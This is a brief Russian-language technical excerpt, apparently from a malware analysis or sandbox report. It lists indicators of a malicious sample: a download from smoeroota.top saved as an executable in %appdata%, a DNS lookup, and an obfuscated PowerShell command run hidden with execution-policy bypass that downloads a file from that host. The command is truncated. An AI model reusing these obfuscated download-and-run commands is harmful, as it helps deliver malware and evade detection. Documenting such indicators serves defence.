Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^e^R^ShELL.^e^XE ^-^e^XE^c^UtIonP^OlIC^Y^ bY^PAsS -No^pROFi^L^e^ ^-^winD^o^wS^TYl^e H^IdDEN^ (^New-OBJec^T ^sYsT^em.^n^et.WEbc^lieN^t)^.d^oWn^L^Oa^D^fi^lE(^'http://smoeroo...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "pOW^e^R^ShELL.^e^XE ^-^e^XE^c^UtIonP^OlIC^Y^ bY^PAsS -No^pROFi^L^e^ ^-^winD^o^wS^TYl^e H^IdDEN^ (^New-OBJec^T ^sYsT^em.^n^et.WEbc^lieN^t)^.d^oWn^L^Oa^D^fi^lE(^'http://smoeroo...' (со скрытым окном)